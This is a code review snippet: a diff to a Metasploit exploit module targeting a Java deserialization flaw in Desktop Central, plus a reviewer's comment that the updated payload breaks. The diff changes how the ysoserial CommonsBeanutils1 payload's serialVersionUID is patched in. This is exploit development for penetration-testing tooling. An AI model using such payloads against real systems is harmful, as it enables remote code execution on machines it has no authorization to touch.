modules/exploits/windows/http/desktopcentral_deserialization.rb

```diff
@@ -134,10 +134,12 @@ def execute_command(cmd, _opts = {})
     # I identified mr_me's binary blob as the CommonsBeanutils1 payload :)
     serialized_payload = Msf::Util::JavaDeserialization.ysoserial_payload(
       'CommonsBeanutils1',
-      cmd,
-      serial_version_uid: "\xcf\x8e\x01\x82\xfe\x4e\xf1\x7e"
+      cmd
     )
 
+    # XXX: Patch in expected serialVersionUID
+    serialized_payload[140, 8] = "\xcf\x8e\x01\x82\xfe\x4e\xf1\x7e"
```

Comment:
This should still work if the offset doesn't change after updating the `CommonsBeanutils1` payload in `data/ysoserial_payloads.json`. However, the updated payload seems to be breaking for me regardless.